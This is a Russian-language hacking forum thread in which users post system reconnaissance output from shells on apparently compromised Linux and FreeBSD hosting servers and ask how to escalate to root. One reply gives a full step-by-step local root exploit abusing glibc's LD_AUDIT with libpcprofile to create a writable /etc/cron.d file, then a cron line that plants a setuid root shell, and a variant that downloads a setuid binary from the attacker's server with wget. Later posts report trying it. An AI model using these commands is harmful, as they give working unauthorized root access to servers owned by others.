-rw-r--r-- 1 root root 26444 2006-08-08 02:47:49.000000000 +0200 /lib/libpopt.so.0.0.0
-rw-r--r-- 1 root root 48256 2006-09-13 03:54:01.000000000 +0200 /lib/libproc-3.2.7.so
-rw-r--r-- 1 root root 81701 2009-01-17 12:58:56.000000000 +0100 /lib/libpthread-0.10.so
lrwxrwxrwx 1 root root 18 2009-06-28 21:55:56.000000000 +0200 /lib/libpthread.so.0 -> libpthread-0.10.so
lrwxrwxrwx 1 root root 18 2006-12-19 16:51:31.000000000 +0100 /lib/libreadline.so.5 -> libreadline.so.5.2
-rw-r--r-- 1 root root 188760 2006-12-19 16:51:33.000000000 +0100 /lib/libreadline.so.5.2
-rw-r--r-- 1 root root 59172 2009-01-17 12:58:52.000000000 +0100 /lib/libresolv-2.3.6.so
lrwxrwxrwx 1 root root 18 2009-06-28 21:55:56.000000000 +0200 /lib/libresolv.so.2 -> libresolv-2.3.6.so
-rw-r--r-- 1 root root 30616 2009-01-17 12:58:52.000000000 +0100 /lib/librt-2.3.6.so
lrwxrwxrwx 1 root root 14 2009-06-28 21:55:56.000000000 +0200 /lib/librt.so.1 -> librt-2.3.6.so
-rw-r--r-- 1 root root 79368 2006-11-05 20:27:33.000000000 +0100 /lib/libselinux.so.1
-rw-r--r-- 1 root root 219824 2006-11-15 09:59:54.000000000 +0100 /lib/libsepol.so.1
lrwxrwxrwx 1 root root 22 2006-09-20 17:39:13.000000000 +0200 /lib/libslang.so.1-UTF8 -> libslang.so.1-UTF8.4.9
-rw-r--r-- 1 root root 370756 2006-09-20 17:39:13.000000000 +0200 /lib/libslang.so.1-UTF8.4.9
lrwxrwxrwx 1 root root 17 2006-10-18 21:50:17.000000000 +0200 /lib/libslang.so.2 -> libslang.so.2.0.6
-rw-r--r-- 1 root root 644012 2006-10-18 21:50:19.000000000 +0200 /lib/libslang.so.2.0.6
lrwxrwxrwx 1 root root 12 2007-12-06 20:57:44.000000000 +0100 /lib/libss.so.2 -> libss.so.2.0
-rw-r--r-- 1 root root 18520 2007-12-06 20:57:50.000000000 +0100 /lib/libss.so.2.0
lrwxrwxrwx 1 root root 17 2006-10-29 18:23:02.000000000 +0100 /lib/libsysfs.so.2 -> libsysfs.so.2.0.1
-rw-r--r-- 1 root root 37496 2006-10-29 18:23:07.000000000 +0100 /lib/libsysfs.so.2.0.1
-rw-r--r-- 1 root root 17860 2009-01-17 12:58:52.000000000 +0100 /lib/libthread_db-1.0.so
lrwxrwxrwx 1 root root 19 2009-06-28 21:55:56.000000000 +0200 /lib/libthread_db.so.1 -> libthread_db-1.0.so
lrwxrwxrwx 1 root root 19 2007-02-13 02:05:37.000000000 +0100 /lib/libusb-0.1.so.4 -> libusb-0.1.so.4.4.4
-rw-r--r-- 1 root root 28740 2007-02-13 02:05:37.000000000 +0100 /lib/libusb-0.1.so.4.4.4
-rw-r--r-- 1 root root 9656 2009-01-17 12:58:52.000000000 +0100 /lib/libutil-2.3.6.so
lrwxrwxrwx 1 root root 16 2009-06-28 21:55:56.000000000 +0200 /lib/libutil.so.1 -> libutil-2.3.6.so
lrwxrwxrwx 1 root root 14 2007-12-06 20:57:44.000000000 +0100 /lib/libuuid.so.1 -> libuuid.so.1.2
-rw-r--r-- 1 root root 9128 2007-12-06 20:57:50.000000000 +0100 /lib/libuuid.so.1.2
lrwxrwxrwx 1 root root 16 2007-02-25 21:06:02.000000000 +0100 /lib/libwrap.so.0 -> libwrap.so.0.7.6
-rw-r--r-- 1 root root 27596 2007-02-25 21:06:02.000000000 +0100 /lib/libwrap.so.0.7.6

sh-3.1$ mount
/dev/vzfs on / type reiserfs (rw,usrquota,grpquota)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
tmpfs on /lib/init/rw type tmpfs (rw,nosuid)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
devpts on /dev/pts type devpts (rw,nosuid,noexec)
tmpfs on /opt/psa/handlers/before-local type tmpfs (rw)
tmpfs on /opt/psa/handlers/before-queue type tmpfs (rw)
tmpfs on /opt/psa/handlers/before-remote type tmpfs (rw)
tmpfs on /opt/psa/handlers/info type tmpfs (rw)
tmpfs on /opt/psa/handlers/spool type tmpfs (rw,mode=0770,uid=2021,gid=31)

sh-3.1$ df -h
Filesystem Size Used Avail Use% Mounted on
/dev/vzfs 6.0G 3.0G 3.1G 49% /
tmpfs 12G 0 12G 0% /lib/init/rw
tmpfs 12G 0 12G 0% /dev/shm
tmpfs 12G 0 12G 0% /opt/psa/handlers/before-local
tmpfs 12G 0 12G 0% /opt/psa/handlers/before-queue
tmpfs 12G 0 12G 0% /opt/psa/handlers/before-remote
tmpfs 12G 0 12G 0% /opt/psa/handlers/info
tmpfs 12G 0 12G 0% /opt/psa/handlers/spool

sh-3.1$ cat /etc/issue
Debian GNU/Linux 4.0 \n \l

sh-3.1$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
25 * * * * root cd / && run-parts --report /etc/cron.hourly
50 5 * * * root cd / && run-parts --report /etc/cron.daily
13 5 * * 7 root cd / && run-parts --report /etc/cron.weekly
38 3 5 * * root cd / && run-parts --report /etc/cron.monthly
#

sh-3.1$ cat /proc/version
Linux version 2.6.18-028stab070.10 (root@rhel5-build-x64) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-46)) #1 SMP Thu Oct 21 13:44:25 MSD 2010

sh-3.1$ cat /proc/sys/vm/mmap_min_addr
cat: /proc/sys/vm/mmap_min_addr: Operation not permitted

sh-3.1$ ls -la /usr/bin/staprun
ls: /usr/bin/staprun: No such file or directory

Можно чем поковырять ? К glibc не уязвима, gcc нету

Gonsalez · 11 Jan 2012

$ uname -a
FreeBSD vint.tryte.kiev.ua 8.1-RELEASE FreeBSD 8.1-RELEASE #0: Fri Oct 8 13:30:26 EEST 2010 [email protected]:/usr/obj/usr/src/sys/ISP-NEW amd64
Click to expand...

$ ls -la /boot
total 2484
drwxr-xr-x 7 root wheel 1024 Oct 8 2010 .
drwxr-xr-x 20 root wheel 512 Sep 6 23:16 ..
-r--r--r-- 1 root wheel 7647 Oct 8 2010 beastie.4th
-r--r--r-- 1 root wheel 8192 Oct 8 2010 boot
-r--r--r-- 1 root wheel 512 Oct 8 2010 boot0
-r--r--r-- 1 root wheel 512 Oct 8 2010 boot0sio
-r--r--r-- 1 root wheel 512 Oct 8 2010 boot1
-r--r--r-- 1 root wheel 7680 Oct 8 2010 boot2
-r--r--r-- 1 root wheel 1201 Oct 8 2010 cdboot
drwxr-xr-x 2 root wheel 512 Oct 8 2010 defaults
-r--r--r-- 1 root wheel 808 Feb 24 2008 device.hints
drwxr-xr-x 2 root wheel 512 Feb 24 2008 firmware
-r--r--r-- 1 root wheel 2262 Oct 8 2010 frames.4th
-r--r--r-- 1 root wheel 7535 Oct 8 2010 gptboot
-r--r--r-- 1 root wheel 26895 Oct 8 2010 gptzfsboot
drwxr-xr-x 2 root wheel 29184 Oct 8 2010 kernel
-r-xr-xr-x 1 root wheel 233472 Oct 8 2010 loader
-r--r--r-- 1 root wheel 5865 Oct 8 2010 loader.4th
-rw-r--r-- 1 root wheel 18 Jun 9 2010 loader.conf
-r--r--r-- 1 root wheel 15219 Oct 8 2010 loader.help
-r-xr-xr-x 1 root wheel 229376 Feb 24 2008 loader.old
-r--r--r-- 1 root wheel 385 Feb 24 2008 loader.rc
-r--r--r-- 1 root wheel 512 Oct 8 2010 mbr
drwxr-xr-x 2 root wheel 512 Feb 24 2008 modules
-r--r--r-- 1 root wheel 512 Oct 8 2010 pmbr
-r--r--r-- 1 root wheel 235520 Oct 8 2010 pxeboot
-r--r--r-- 1 root wheel 703 Oct 8 2010 screen.4th
-r--r--r-- 1 root wheel 35136 Oct 8 2010 support.4th
drwxr-xr-x 2 root wheel 512 Feb 24 2008 zfs
-r--r--r-- 1 root wheel 33280 Oct 8 2010 zfsboot
-r-xr-xr-x 1 root wheel 253952 Oct 8 2010 zfsloader
Click to expand...

$ mount
/dev/twed0s1a on / (ufs, local)
devfs on /dev (devfs, local, multilabel)
/dev/twed0s1e on /tmp (ufs, local, soft-updates)
/dev/twed0s1f on /usr (ufs, local, with quotas, soft-updates)
/dev/twed0s1d on /var (ufs, local, soft-updates)
Click to expand...

$ df -h
Filesystem Size Used Avail Capacity Mounted on
/dev/twed0s1a 496M 473M -17M 104% /
devfs 1.0K 1.0K 0B 100% /dev
/dev/twed0s1e 496M 21M 435M 5% /tmp
/dev/twed0s1f 423G 203G 186G 52% /usr
/dev/twed0s1d 19G 9.1G 8.8G 51% /var
Click to expand...

$ cat /etc/crontab
# /etc/crontab - root's crontab for FreeBSD
#
# $FreeBSD: src/etc/crontab,v 1.32 2002/11/22 16:13:39 tom Exp $
#
SHELL=/bin/sh
PATH=/etc:/bin:/sbin:/usr/bin:/usr/sbin
HOME=/var/log
#
#minute hour mday month wday who command
#
*/5 * * * * root /usr/libexec/atrun
#
# Save some entropy so that /dev/random can re-seed on boot.
*/11 * * * * operator /usr/libexec/save-entropy
#
# Rotate log files every hour, if necessary.
0 * * * * root newsyslog
#
# Perform daily/weekly/monthly maintenance.
1 3 * * * root periodic daily
15 4 * * 6 root periodic weekly
30 5 1 * * root periodic monthly
#
# Adjust the time zone if the CMOS clock keeps local time, as opposed to
# UTC time. See adjkerntz(8) for details.
1,31 0-5 * * * root adjkerntz -a

#*/1 * * * * root pkill -u nearbirds.com
#*/1 * * * * root pkill -u kriza.com.ua
#*/1 * * * * root pkill -u novosti7.com
Click to expand...

$ pwd
/usr/home/multisport/data/tmp
Click to expand...

Выложил не все команды, т.к. остальные не выполняются..
Пробовал пробивать FreeBSD 8.*, 7.* Local ‘root’ Exploit, права остаются без изменения..

Expl0ited · 11 Jan 2012

Можно чем поковырять ? К glibc не уязвима, gcc нету
Click to expand...

С чего это вдруг?
Code:
-rwxr-xr-x 1 root root 1147548 2009-01-17 12:58:52.000000000 +0100 /lib/libc-2.3.6.so
-rw-r--r-- 1 root root 13644 2009-01-17 12:58:52.000000000 +0100 /lib/libmemusage.so
-rw-r--r-- 1 root root 5400 2009-01-17 12:58:52.000000000 +0100 /lib/libpcprofile.so

gl0w · 11 Jan 2012

Скрипты выдают нечто вроде "System seems to be not Vulnerable", руками тоже не получается (компилил suid'ник на другой машине)

Expl0ited · 11 Jan 2012

Что вы там компилите? Я не понимаю. Пошаговое руководство:

Убираем маску прав доступа для создаваемых файлов (при umask 0 файлы будут создаваться по умолчанию с правами "-rw-rw-rw-")

umask 0

Для атаки будем использовать стандартную библиотеку профилирования libpcprofile, входящую в комплект libc:

dpkg -S /lib/libpcprofile.so
libc6: /lib/libpcprofile.so

ls -l /lib/libpcprofile.so
-rw-r--r-- 1 root root 5496 2010-10-12 03:32 /lib/libpcprofile.so

Код инициализации libpcprofile не проверяет различия эффективного и текущего идентификатора пользователя, но при этом позволяет создать лог-файл, который можно создать в любой системной директории:

LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
ERROR: ld.so: object 'libpcprofile.so' cannot be loaded as audit interface: undefined symbol: la_version; ignored.

Несмотря на вывод ошибки, процедура инициализации выполнилась и в директории /etc/cron.d был создан лог-файл:

ls -l /etc/cron.d/exploit
-rw-rw-rw- 1 root taviso 65 2010-10-21 14:22 /etc/cron.d/exploit

Как видно, права доступа на созданный файл, позволяют любому пользователю записать в него любые данные, которые затем будут выполнены системой cron от пользователя root. Например:

printf "* * * * * root cp /bin/dash /tmp/exploit; chmod u+s /tmp/exploit\n" > /etc/cron.d/exploit

Через пару минут наблюдаем:

ls -l /tmp/exploit
ls: cannot access /tmp/exploit: No such file or directory
...

ls -l /tmp/exploit
-rwsr-xr-x 1 root root 83888 2010-10-21 14:25 /tmp/exploit

/tmp/exploit

whoami
root

Так же можно, просто скомпилировать суидник на своей системе, и заказчать на атакуемый сервер, дадим ему имя например suid и поместим в директорию /tmp, и уже от рута, дадим ему необходимые для дальнейшей работы права от рута
Code:
printf "* * * * * root wget http://твой_сервер/suid -O /tmp/suid;chown root:root /tmp/suid;chmod 4755 /tmp/suid\n" > /etc/cron.d/exploit
И ничего компилировать не нужно! Я не знаю какими скриптами вы пользуетесь, но лучше всего сначала воспользоваться головой.

gl0w · 12 Jan 2012

sh-3.1$ umask 0

sh-3.1$ dpkg -S /lib/libpcprofile.so
libc6: /lib/libpcprofile.so

sh-3.1$ ls -l /lib/libpcprofile.so
-rw-r--r-- 1 root root 5400 Jan 17 2009 /lib/libpcprofile.so

sh-3.1$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
[-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
[-M mtu discovery hint] [-S sndbuf]
[ -T timestamp option ] [ -Q tos ] [hop1 ...] destination

sh-3.1$ ls -l /etc/cron.d/exploit
ls: /etc/cron.d/exploit: No such file or directory

Так тоже не выходит, а компилировал в тот раз сам suid'ник :3

SecondLife · 12 Jan 2012

$ uname -a

Code:

Linux *** 2.6.26-2-amd64 #1 SMP Wed Sep 21 03:36:44 UTC 2011 x86_64 GNU/Linux

$ ls -la /boot

Code:

total 9834
drwxr-xr-x  4 root root    1024 Dec 17 18:25 .
drwxr-xr-x 23 root root    4096 Dec 20 08:11 ..
-rw-r--r--  1 root root 1227280 Sep 21 10:04 System.map-2.6.26-2-amd64
-rw-r--r--  1 root root   85694 Sep 21 10:04 config-2.6.26-2-amd64
drwxr-xr-x  2 root root    1024 Oct 14 11:10 grub
-rw-r--r--  1 root root 6936449 Oct 13 10:37 initrd.img-2.6.26-2-amd64
drwx------  2 root root   12288 Jul 13  2011 lost+found
-rw-r--r--  1 root root 1756944 Sep 21 10:02 vmlinuz-2.6.26-2-amd64

$ ls -la --full-time /lib/lib*

Code:

-rw-r--r-- 1 root root    6176 2011-01-08 00:33:04.000000000 +0300 /lib/libBrokenLocale-2.7.so
lrwxrwxrwx 1 root root      22 2011-07-12 21:51:06.000000000 +0400 /lib/libBrokenLocale.so.1 -> libBrokenLocale-2.7.so
-rw-r--r-- 1 root root   18600 2011-01-08 00:33:04.000000000 +0300 /lib/libSegFault.so
lrwxrwxrwx 1 root root      15 2011-07-12 21:51:04.000000000 +0400 /lib/libacl.so.1 -> libacl.so.1.1.0
-rw-r--r-- 1 root root   29360 2008-04-24 01:01:34.000000000 +0400 /lib/libacl.so.1.1.0
-rw-r--r-- 1 root root   14832 2011-01-08 00:33:04.000000000 +0300 /lib/libanl-2.7.so
lrwxrwxrwx 1 root root      13 2011-07-12 21:51:06.000000000 +0400 /lib/libanl.so.1 -> libanl-2.7.so
lrwxrwxrwx 1 root root      16 2011-07-12 21:51:04.000000000 +0400 /lib/libattr.so.1 -> libattr.so.1.1.0
-rw-r--r-- 1 root root   17424 2009-02-10 12:47:21.000000000 +0300 /lib/libattr.so.1.1.0
lrwxrwxrwx 1 root root      15 2011-07-12 21:51:05.000000000 +0400 /lib/libblkid.so.1 -> libblkid.so.1.0
-rw-r--r-- 1 root root   46608 2008-10-13 07:54:02.000000000 +0400 /lib/libblkid.so.1.0
lrwxrwxrwx 1 root root      15 2011-07-12 21:51:16.000000000 +0400 /lib/libbz2.so.1 -> libbz2.so.1.0.4
lrwxrwxrwx 1 root root      15 2011-07-12 21:51:16.000000000 +0400 /lib/libbz2.so.1.0 -> libbz2.so.1.0.4
-rw-r--r-- 1 root root   66224 2010-08-18 21:44:47.000000000 +0400 /lib/libbz2.so.1.0.4
-rwxr-xr-x 1 root root 1375536 2011-01-08 00:33:04.000000000 +0300 /lib/libc-2.7.so
lrwxrwxrwx 1 root root      11 2011-07-12 21:51:06.000000000 +0400 /lib/libc.so.6 -> libc-2.7.so
lrwxrwxrwx 1 root root      14 2011-07-13 09:10:58.000000000 +0400 /lib/libcap.so.1 -> libcap.so.1.10
-rw-r--r-- 1 root root   14880 2006-03-16 14:56:29.000000000 +0300 /lib/libcap.so.1.10
lrwxrwxrwx 1 root root      14 2011-07-12 21:53:15.000000000 +0400 /lib/libcap.so.2 -> libcap.so.2.11
-rw-r--r-- 1 root root   16976 2008-07-26 19:52:16.000000000 +0400 /lib/libcap.so.2.11
lrwxrwxrwx 1 root root      17 2011-07-12 21:51:16.000000000 +0400 /lib/libcfont.so.0 -> libcfont.so.0.0.0
-rw-r--r-- 1 root root   12776 2008-04-16 01:40:42.000000000 +0400 /lib/libcfont.so.0.0.0
-rw-r--r-- 1 root root  190760 2011-01-08 00:33:04.000000000 +0300 /lib/libcidn-2.7.so
lrwxrwxrwx 1 root root      14 2011-07-12 21:51:06.000000000 +0400 /lib/libcidn.so.1 -> libcidn-2.7.so
lrwxrwxrwx 1 root root      17 2011-07-12 21:51:05.000000000 +0400 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rw-r--r-- 1 root root   11648 2008-10-13 07:54:02.000000000 +0400 /lib/libcom_err.so.2.1
lrwxrwxrwx 1 root root      19 2011-07-12 21:51:16.000000000 +0400 /lib/libconsole.so.0 -> libconsole.so.0.0.0
-rw-r--r-- 1 root root  140840 2008-04-16 01:40:42.000000000 +0400 /lib/libconsole.so.0.0.0
-rw-r--r-- 1 root root   39112 2011-01-08 00:33:04.000000000 +0300 /lib/libcrypt-2.7.so
lrwxrwxrwx 1 root root      15 2011-07-12 21:51:06.000000000 +0400 /lib/libcrypt.so.1 -> libcrypt-2.7.so
lrwxrwxrwx 1 root root      19 2011-07-12 21:51:16.000000000 +0400 /lib/libctutils.so.0 -> libctutils.so.0.0.0
-rw-r--r-- 1 root root   21024 2008-04-16 01:40:42.000000000 +0400 /lib/libctutils.so.0.0.0
-rw-r--r-- 1 root root   98840 2008-10-01 18:33:16.000000000 +0400 /lib/libdevmapper.so.1.02.1
-rw-r--r-- 1 root root   14616 2011-01-08 00:33:04.000000000 +0300 /lib/libdl-2.7.so
lrwxrwxrwx 1 root root      12 2011-07-12 21:51:06.000000000 +0400 /lib/libdl.so.2 -> libdl-2.7.so
lrwxrwxrwx 1 root root      13 2011-07-12 21:51:05.000000000 +0400 /lib/libe2p.so.2 -> libe2p.so.2.3
-rw-r--r-- 1 root root   25424 2008-10-13 07:54:02.000000000 +0400 /lib/libe2p.so.2.3
lrwxrwxrwx 1 root root      16 2011-07-12 21:51:05.000000000 +0400 /lib/libext2fs.so.2 -> libext2fs.so.2.4
-rw-r--r-- 1 root root  187416 2008-10-13 07:54:02.000000000 +0400 /lib/libext2fs.so.2.4
-rw-r--r-- 1 root root   93016 2009-01-02 14:14:18.000000000 +0300 /lib/libgcc_s.so.1
lrwxrwxrwx 1 root root      17 2011-07-12 21:51:18.000000000 +0400 /lib/libhistory.so.5 -> libhistory.so.5.2
-rw-r--r-- 1 root root   32968 2009-01-14 14:19:12.000000000 +0300 /lib/libhistory.so.5.2
-rw-r--r-- 1 root root    7736 2008-09-01 15:59:38.000000000 +0400 /lib/libkeyutils-1.2.so
lrwxrwxrwx 1 root root      18 2011-07-12 21:53:15.000000000 +0400 /lib/libkeyutils.so.1 -> libkeyutils-1.2.so
-rw-r--r-- 1 root root  534736 2011-01-08 00:33:04.000000000 +0300 /lib/libm-2.7.so
lrwxrwxrwx 1 root root      11 2011-07-12 21:51:06.000000000 +0400 /lib/libm.so.6 -> libm-2.7.so
-rw-r--r-- 1 root root   18592 2011-01-08 00:33:04.000000000 +0300 /lib/libmemusage.so
lrwxrwxrwx 1 root root      17 2011-07-12 21:51:07.000000000 +0400 /lib/libncurses.so.5 -> libncurses.so.5.7
-rw-r--r-- 1 root root  256288 2008-12-15 00:31:27.000000000 +0300 /lib/libncurses.so.5.7
lrwxrwxrwx 1 root root      18 2011-07-12 21:51:18.000000000 +0400 /lib/libncursesw.so.5 -> libncursesw.so.5.7
-rw-r--r-- 1 root root  305952 2008-12-15 00:31:28.000000000 +0300 /lib/libncursesw.so.5.7
-rw-r--r-- 1 root root   88968 2011-01-08 00:33:04.000000000 +0300 /lib/libnsl-2.7.so
lrwxrwxrwx 1 root root      13 2011-07-12 21:51:06.000000000 +0400 /lib/libnsl.so.1 -> libnsl-2.7.so
-rw-r--r-- 1 root root   31536 2011-01-08 00:33:04.000000000 +0300 /lib/libnss_compat-2.7.so
lrwxrwxrwx 1 root root      20 2011-07-12 21:51:06.000000000 +0400 /lib/libnss_compat.so.2 -> libnss_compat-2.7.so
-rw-r--r-- 1 root root   18752 2011-01-08 00:33:04.000000000 +0300 /lib/libnss_dns-2.7.so
lrwxrwxrwx 1 root root      17 2011-07-12 21:51:06.000000000 +0400 /lib/libnss_dns.so.2 -> libnss_dns-2.7.so
-rw-r--r-- 1 root root   47520 2011-01-08 00:33:04.000000000 +0300 /lib/libnss_files-2.7.so
lrwxrwxrwx 1 root root      19 2011-07-12 21:51:06.000000000 +0400 /lib/libnss_files.so.2 -> libnss_files-2.7.so
-rw-r--r-- 1 root root   18784 2011-01-08 00:33:04.000000000 +0300 /lib/libnss_hesiod-2.7.so
lrwxrwxrwx 1 root root      20 2011-07-12 21:51:06.000000000 +0400 /lib/libnss_hesiod.so.2 -> libnss_hesiod-2.7.so
-rw-r--r-- 1 root root   43472 2011-01-08 00:33:04.000000000 +0300 /lib/libnss_nis-2.7.so
lrwxrwxrwx 1 root root      17 2011-07-12 21:51:06.000000000 +0400 /lib/libnss_nis.so.2 -> libnss_nis-2.7.so
-rw-r--r-- 1 root root   51616 2011-01-08 00:33:04.000000000 +0300 /lib/libnss_nisplus-2.7.so
lrwxrwxrwx 1 root root      21 2011-07-12 21:51:06.000000000 +0400 /lib/libnss_nisplus.so.2 -> libnss_nisplus-2.7.so
lrwxrwxrwx 1 root root      17 2011-07-12 21:51:07.000000000 +0400 /lib/libpam.so.0 -> libpam.so.0.81.12
-rw-r--r-- 1 root root   46256 2009-03-24 12:08:13.000000000 +0300 /lib/libpam.so.0.81.12
lrwxrwxrwx 1 root root      21 2011-07-12 21:51:07.000000000 +0400 /lib/libpam_misc.so.0 -> libpam_misc.so.0.81.3
-rw-r--r-- 1 root root   10920 2009-03-24 12:08:13.000000000 +0300 /lib/libpam_misc.so.0.81.3
lrwxrwxrwx 1 root root      17 2011-07-12 21:51:07.000000000 +0400 /lib/libpamc.so.0 -> libpamc.so.0.81.0
-rw-r--r-- 1 root root   11464 2009-03-24 12:08:13.000000000 +0300 /lib/libpamc.so.0.81.0
-rw-r--r-- 1 root root    6192 2011-01-08 00:33:04.000000000 +0300 /lib/libpcprofile.so
lrwxrwxrwx 1 root root      17 2011-12-19 12:58:54.000000000 +0400 /lib/libpcre.so.3 -> libpcre.so.3.12.1
-rw-r--r-- 1 root root  198176 2010-08-01 00:45:45.000000000 +0400 /lib/libpcre.so.3.12.1
lrwxrwxrwx 1 root root      16 2011-07-12 21:51:18.000000000 +0400 /lib/libpopt.so.0 -> libpopt.so.0.0.0
-rw-r--r-- 1 root root   37712 2008-06-25 15:06:15.000000000 +0400 /lib/libpopt.so.0.0.0
-rw-r--r-- 1 root root   68064 2009-01-12 01:08:40.000000000 +0300 /lib/libproc-3.2.7.so
-rwxr-xr-x 1 root root  130114 2011-01-08 00:33:04.000000000 +0300 /lib/libpthread-2.7.so
lrwxrwxrwx 1 root root      17 2011-07-12 21:51:06.000000000 +0400 /lib/libpthread.so.0 -> libpthread-2.7.so
lrwxrwxrwx 1 root root      18 2011-07-12 21:51:18.000000000 +0400 /lib/libreadline.so.5 -> libreadline.so.5.2
-rw-r--r-- 1 root root  258616 2009-01-14 14:19:12.000000000 +0300 /lib/libreadline.so.5.2
-rw-r--r-- 1 root root   72568 2011-01-08 00:33:04.000000000 +0300 /lib/libresolv-2.7.so
lrwxrwxrwx 1 root root      16 2011-07-12 21:51:06.000000000 +0400 /lib/libresolv.so.2 -> libresolv-2.7.so
-rw-r--r-- 1 root root   35784 2011-01-08 00:33:04.000000000 +0300 /lib/librt-2.7.so
lrwxrwxrwx 1 root root      12 2011-07-12 21:51:06.000000000 +0400 /lib/librt.so.1 -> librt-2.7.so
-rw-r--r-- 1 root root  109464 2008-09-16 11:22:47.000000000 +0400 /lib/libselinux.so.1
-rw-r--r-- 1 root root  237168 2008-07-12 18:29:13.000000000 +0400 /lib/libsepol.so.1
lrwxrwxrwx 1 root root      17 2011-07-12 21:51:07.000000000 +0400 /lib/libslang.so.2 -> libslang.so.2.1.3
-rw-r--r-- 1 root root  952736 2008-03-17 22:22:37.000000000 +0300 /lib/libslang.so.2.1.3
lrwxrwxrwx 1 root root      12 2011-07-12 21:51:05.000000000 +0400 /lib/libss.so.2 -> libss.so.2.0
-rw-r--r-- 1 root root   24416 2008-10-13 07:54:02.000000000 +0400 /lib/libss.so.2.0
lrwxrwxrwx 1 root root      17 2011-07-13 23:15:23.000000000 +0400 /lib/libsysfs.so.2 -> libsysfs.so.2.0.1
-rw-r--r-- 1 root root   43920 2008-09-06 13:26:29.000000000 +0400 /lib/libsysfs.so.2.0.1
-rw-r--r-- 1 root root   31376 2011-01-08 00:33:04.000000000 +0300 /lib/libthread_db-1.0.so
lrwxrwxrwx 1 root root      19 2011-07-12 21:51:06.000000000 +0400 /lib/libthread_db.so.1 -> libthread_db-1.0.so
lrwxrwxrwx 1 root root      13 2011-07-12 21:51:07.000000000 +0400 /lib/libtic.so.5 -> libtic.so.5.7
-rw-r--r-- 1 root root   77328 2008-12-15 00:31:27.000000000 +0300 /lib/libtic.so.5.7
lrwxrwxrwx 1 root root      14 2011-07-12 21:51:18.000000000 +0400 /lib/libticw.so.5 -> libticw.so.5.7
-rw-r--r-- 1 root root   77328 2008-12-15 00:31:28.000000000 +0300 /lib/libticw.so.5.7
lrwxrwxrwx 1 root root      19 2011-07-12 21:51:18.000000000 +0400 /lib/libusb-0.1.so.4 -> libusb-0.1.so.4.4.4
-rw-r--r-- 1 root root   32608 2008-09-05 14:18:53.000000000 +0400 /lib/libusb-0.1.so.4.4.4
-rw-r--r-- 1 root root   10560 2011-01-08 00:33:04.000000000 +0300 /lib/libutil-2.7.so
lrwxrwxrwx 1 root root      14 2011-07-12 21:51:06.000000000 +0400 /lib/libutil.so.1 -> libutil-2.7.so
lrwxrwxrwx 1 root root      14 2011-07-12 21:51:05.000000000 +0400 /lib/libuuid.so.1 -> libuuid.so.1.2
-rw-r--r-- 1 root root   15344 2008-10-13 07:54:02.000000000 +0400 /lib/libuuid.so.1.2
lrwxrwxrwx 1 root root      22 2011-07-12 21:51:44.000000000 +0400 /lib/libvolume_id.so.0 -> libvolume_id.so.0.85.0
-rw-r--r-- 1 root root   33368 2009-08-26 14:27:16.000000000 +0400 /lib/libvolume_id.so.0.85.0
lrwxrwxrwx 1 root root      16 2011-07-12 21:51:18.000000000 +0400 /lib/libwrap.so.0 -> libwrap.so.0.7.6
-rw-r--r-- 1 root root   36208 2008-07-26 04:05:10.000000000 +0400 /lib/libwrap.so.0.7.6
lrwxrwxrwx 1 root root      19 2011-07-12 21:51:17.000000000 +0400 /lib/libxtables.so.0 -> libxtables.so.0.0.0
-rw-r--r-- 1 root root   23392 2009-02-09 22:35:51.000000000 +0300 /lib/libxtables.so.0.0.0

$ mount

Code:

/dev/md3 on / type ext3 (rw,noatime,grpquota,usrquota,errors=remount-ro)
tmpfs on /lib/init/rw type tmpfs (rw,nosuid,mode=0755)
proc on /proc type proc (rw,noexec,nosuid,nodev)
sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
procbususb on /proc/bus/usb type usbfs (rw)
udev on /dev type tmpfs (rw,mode=0755)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=620)
/dev/md1 on /boot type ext3 (rw,noatime)

$ df -h

Code:

Filesystem            Size  Used Avail Use% Mounted on
/dev/md3              448G  149G  277G  35% /
tmpfs                 5.9G     0  5.9G   0% /lib/init/rw
udev                   10M  800K  9.3M   8% /dev
tmpfs                 5.9G     0  5.9G   0% /dev/shm
/dev/md1              243M   16M  215M   7% /boot

$ cat /etc/issue

Code:

Debian GNU/Linux 5.0 \n \l

$ cat /etc/crontab

Code:

# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#*/1 *	* * *	root	/bin/date >> /root/test.mem.txt && /bin/ps axf | /bin/grep sync -B6 >> /root/test.mem.txt && /bin/ls -la /proc/sys/vm/drop_caches >> /root/test.mem.txt && ls -la /proc/*/fd |grep drop_caches >> /root/test.mem.txt
#

$ cat /proc/version

Code:

Linux version 2.6.26-2-amd64 (Debian 2.6.26-27) ([email protected]) (gcc version 4.1.3 20080704 (prerelease) (Debian 4.1.2-25)) #1 SMP Wed Sep 21 03:36:44 UTC 2011

$ cat /proc/sys/vm/mmap_min_addr

Code:

$ pwd

Code:

$ ls -la /usr/bin/staprun
ничего не выдало

SEO.NEWBIE · 13 Jan 2012

